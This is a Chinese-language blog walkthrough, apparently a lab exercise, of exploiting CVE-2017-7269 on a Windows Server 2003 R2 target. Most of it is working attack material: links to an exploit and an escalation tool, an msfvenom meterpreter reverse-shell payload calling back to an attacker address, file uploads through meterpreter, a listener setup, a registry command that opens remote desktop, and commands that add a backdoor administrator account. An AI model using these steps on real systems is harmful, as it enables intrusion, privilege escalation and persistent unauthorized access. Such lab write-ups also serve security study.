提權文件下載:https://www.lanzous.com/iaq7egd
靶機:Windows server 2003 r2
EXP:https://github.com/zcgonvh/cve-2017-7269
把EXP導入Metasploit
啟動MSF
嘗試加載攻擊模塊
發現找不到該模塊,這是因為msf不識別-,把-改為下劃線就好了
重新啟動程序
成功加載攻擊模塊
查看需要設置的參數
設置參數
加載攻擊載荷
開始利用
利用成功,成功拿到shell
生成payload
<code>root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.136 LPORT=6666 -f exe -o system.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: system.exe/<code>
嘗試提權
測試得知根目錄具有寫權限
上傳提權文件
<code>meterpreter > upload "/root/pr.exe" c:\\\\shell
[*] uploading : /root/pr.exe -> c:\\shell
[*] uploaded : /root/pr.exe -> c:\\shell\\pr.exe
meterpreter > upload "/root/system.exe" c:\\\\shell
[*] uploading : /root/system.exe -> c:\\shell
[*] uploaded : /root/system.exe -> c:\\shell\\system.exe
meterpreter >/<code>
開啟一個msfconsole並進入監聽狀態
<code>sf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.52.136
lhost => 192.168.52.136
msf5 exploit(multi/handler) > set lport 6666
lport => 6988
msf5 exploit(multi/handler) > exploit /<code>
執行提權程序
成功反彈一個shell
得到最高權限
使用以下命令開啟3389端口
<code>REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f/<code>
使用netstat -an查看是否開啟
添加管理員賬號
<code>C:\\shell>pr.exe "net user hack !123 /add"
pr.exe "net user hack !123 /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net user hack !123 /add/<code>
添加到管理組
<code>C:\\shell>pr.exe "net localgroup administrators hack /add"
pr.exe "net localgroup administrators hack /add"
/xxoo/-->Build&&Change By p
/xxoo/-->This exploit gives you a Local System shell
/xxoo/-->Got WMI process Pid: 1796
begin to try
/xxoo/-->Found token SYSTEM
/xxoo/-->Command:net localgroup administrators hack /add
命令成功完成。/<code>
啟動遠程桌面連接
輸入目標IP
接著輸入我們創建的管理員賬戶和密碼
閱讀更多 夏了茶糜7 的文章